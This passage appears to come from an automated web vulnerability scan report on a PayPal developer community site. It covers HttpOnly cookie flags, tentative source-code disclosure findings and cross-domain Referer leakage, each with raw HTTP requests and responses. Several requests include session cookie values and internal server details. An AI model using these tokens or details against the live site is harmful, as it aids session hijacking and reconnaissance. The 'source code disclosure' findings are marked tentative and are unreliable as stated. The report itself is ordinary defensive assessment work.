Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.221. https://www.x.com/people/sebastian.kopp@wooga.com

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.222. https://www.x.com/people/skier

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31323739393b332c3133313833303b332c3133363236393b332c3132393239303b332c3133373135383b332c3133373331333b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

5. Source code disclosure
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


5.1. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=354 t=1313114380766811
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.2. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:49 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654809
JP: D=647 t=1313156390522448
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.3. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/docs/DOC-1106
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 981912
JP: D=369 t=1313156410569291
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.4. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:26 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 648777
JP: D=18063 t=1313114366859700
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.5. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:50 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 657477
JP: D=368 t=1313156330206991
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.6. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:43 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Vary: User-Agent
Content-Type: text/javascript
JP: D=43847 t=1313156323842940
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.7. https://www.x.com/themes/paypal/js/custom.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /themes/paypal/js/custom.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 31770
JP: D=418 t=1313114381172952
Vary: User-Agent
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...

6. Cross-domain Referer leakage
There are 31 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. https://www.x.com/community/feeds

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/feeds?community=2276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=43069 t=1313157093427123
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.2. https://www.x.com/community/ppx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=86319 t=1313157084962149
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.3. https://www.x.com/community/ppx/button_manager

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/button_manager?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323031343b31342c323031313b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=279170 t=1313157034442237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>Test your integration using the <a href="https://developer.paypal.com/" title="PayPal Sandbox">PayPal Sandbox</a>
...[SNIP]...
<p>The standard rate for receiving payments for goods and services is 2.9%. For details, see PayPal's standard <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_display-fees-outside" title="fee structure">fee structure</a>
...[SNIP]...
<p>If your sales volume exceeds USD $3,000.00/month, your rate can be as low as 1.9%. For details, see <a href="https://merchant.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&amp;content_ID=merchant/home" title="PayPal Merchant Services">PayPal Merchant Services</a>
...[SNIP]...
<p>If your transactions typically average less than $10.00, you could save money with our "5% plus 5.." rate. For information, see <a href="https://micropayments.paypal-labs.com/" title="Micropayments">Micropayments</a>
...[SNIP]...
nctional. You can hold multiple currency balances in your PayPal account or convert payments you receive at competitive rates. Currency conversion and cross-border fees may apply. For information, see <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-xborder-fees-outside&amp;countries=" title="Transaction Fees for Cross-border Payments">Transaction Fees for Cross-border Payments</a>
...[SNIP]...
<p>For answers to frequent questions, go to our <a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help" title="Help Center">Help Center</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.4. https://www.x.com/community/ppx/dev-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/dev-tools?view=test1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323031343b31342c323030383b31342c323030393b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=111454 t=1313157033966642
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.5. https://www.x.com/community/ppx/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /community/ppx/developer?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323131353b31342c323030323b31342c323232363b31342c323135343b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=156635 t=1313157084184224
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
